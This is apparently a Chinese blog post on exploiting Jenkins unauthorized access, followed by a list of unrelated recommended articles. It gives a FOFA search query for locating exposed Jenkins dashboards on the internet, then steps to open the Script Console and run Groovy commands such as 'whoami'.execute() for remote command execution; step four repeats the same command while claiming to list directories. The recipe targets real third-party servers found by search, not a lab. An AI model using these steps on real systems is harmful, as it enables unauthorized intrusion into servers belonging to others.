【Jenkins未授权访问漏洞 】

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

第一步:使用fofa语句搜索

搜索语句:

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一个一个搜索,直到出现 Manage Jenkins,在打开的URL中...点击 Manage Jenkins

Scritp Console 再执行以下命令.

第二步:点进去后,页面往下翻看到Scritp Console------点击。

第三步:执行命令,查看当前用户名

println "whoami".execute().text

如下图就是执行中

第四步:执行命令,查看目录

println "whoami".execute().text

相关推荐
陈皮糖..26 分钟前
27 届运维实习笔记|第三、四周:从流程熟练到故障排查,企业运维实战深化
运维·笔记·sql·nginx·ci/cd·云计算·jenkins
莫白媛1 小时前
Linux在限制敏感命令下的修改用户密码小白版
linux·运维·服务器
hhb_6182 小时前
C Shell 基础语法与高阶运维实战指南
运维·c语言·chrome
爱学习的小囧3 小时前
VMware vCenter Server 9.0.2.0 资源详解+完整部署教程+下载指南+常见问题
运维·服务器·esxi·vmware·虚拟化·esxi9.0.2.0
贾斯汀玛尔斯4 小时前
每天学一个算法--单调栈(Monotonic Stack)
运维·服务器·算法
hhb_6184 小时前
Linux底层运维自动化挂载与磁盘分区实战指南
linux·运维·自动化
SpikeKing4 小时前
Server - 配置 SQLBot 智能问数项目
运维·server·sqlbot
cui_ruicheng4 小时前
Linux库制作与使用(二):ELF文件与链接过程
linux·运维·服务器
怀旧,4 小时前
【Linux系统编程】18. Linux进程信号(上)
linux·运维·服务器
舰长1154 小时前
Windows服务器修改默认远程端口3389
运维·服务器